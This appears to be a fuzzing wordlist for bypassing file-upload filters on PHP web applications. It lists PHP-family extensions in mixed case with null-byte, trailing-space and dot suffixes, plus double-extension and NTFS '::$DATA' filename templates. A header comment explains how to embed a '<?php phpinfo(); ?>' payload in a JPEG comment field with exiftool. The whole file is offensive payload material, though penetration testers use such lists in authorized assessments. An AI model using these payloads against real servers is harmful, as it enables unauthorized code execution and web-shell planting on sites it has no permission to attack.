# -----
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:
#-----
#<?php phpinfo(); ?> 
iNc
iNc%00
iNc%20%20%20
iNc%20%20%20...%20.%20..
iNc......
inc  
inc%00
inc%20%20%20
inc%20%20%20...%20.%20..
inc......
pHp
pHp%00
pHp%20%20%20
pHp%20%20%20...%20.%20..
pHp......
pHp3
pHp3%00
pHp3%20%20%20
pHp3%20%20%20...%20.%20..
pHp3......
pHp4
pHp4%00
pHp4%20%20%20
pHp4%20%20%20...%20.%20..
pHp4......
pHp5
pHp5%00
pHp5%20%20%20
pHp5%20%20%20...%20.%20..
pHp5......
pHtml
pHtml%00
pHtml%20%20%20
pHtml%20%20%20...%20.%20..
pHtml......
php
php%00
php%20%20%20
php%20%20%20...%20.%20..
php......
php3
php3%00
php3%20%20%20
php3%20%20%20...%20.%20..
php3......
php4
php4%00
php4%20%20%20
php4%20%20%20...%20.%20..
php4......
php5
php5%00
php5%20%20%20
php5%20%20%20...%20.%20..
php5......
phtml
phtml%00
phtml%20%20%20
phtml%20%20%20...%20.%20..
phtml......
{PHPSCRIPT}
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php.php.rar 
{PHPSCRIPT}.php.rar 
{PHPSCRIPT}.php::$DATA
{PHPSCRIPT}.phtml
{PHPSCRIPT}::$DATA
